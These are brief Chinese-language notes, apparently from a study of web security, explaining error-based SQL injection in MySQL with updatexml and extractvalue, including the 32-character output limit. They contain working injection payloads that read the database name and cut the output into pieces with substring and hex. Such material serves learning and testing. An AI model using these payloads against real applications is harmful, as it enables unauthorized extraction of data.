*通过updatexml报错
and updatexml(1,payload,1)
同样该语句对输出的字符长度也做了限制,其最长输出32位
并且该语句对payload的反悔类型也做了限制,只有在payload返回的不是xml格式才会生效
语法:updatexml(目标xml文档,xml路径,更新的内容)
*通过ExtractValue报错
and extractvalue(1, payload)
输出字符有长度限制,最长32位。
Extractvalue()函数语法:Extractvalue(目标xml文件,xml路径)
Xml的路径格式为/xx/xx/xx…,如果写入其他格式,就会报错,并且会返回我们写入的非法格式的内容,这个非法格式的内容就是我们有要查询的东西
Extractvalue(‘1’,concat(‘~’,(select database())) #
返回database()查询的内容
截取前五位
Extractvalue(‘1’,concat(‘~’,substring(hex((select database()),1,5))))